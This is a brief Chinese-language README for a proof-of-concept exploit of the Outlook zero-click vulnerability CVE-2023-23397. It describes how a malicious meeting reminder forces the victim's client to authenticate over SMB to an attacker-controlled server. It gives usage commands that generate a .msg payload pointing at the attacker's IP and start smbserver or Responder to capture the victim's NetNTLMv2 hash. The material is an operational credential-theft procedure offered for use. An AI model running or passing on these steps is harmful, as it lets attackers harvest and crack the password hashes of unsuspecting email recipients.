影响 Outlook 胖客户端 的 CVE-2023-23397 漏洞的简单且粗糙的概念验证 (PoC)。
Outlook 在用户输入控制方面存在缺陷,允许配置会议和约会提醒的声音。实际上,攻击者无需用户进行任何操作(零点击漏洞),就能强制受害者连接到自己的服务器。
利用此漏洞的攻击者通过 SMB 请求,会获取基于被诱捕用户密码的 NetNTLMv2 摘要。该请求在邮件到达收件箱时立即触发。
.msg 有效负载。在一个会话中:
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
在第二个会话中(根据需要运行 smbserver 或 responder)。
smbserver.py -smb2support SHARE .
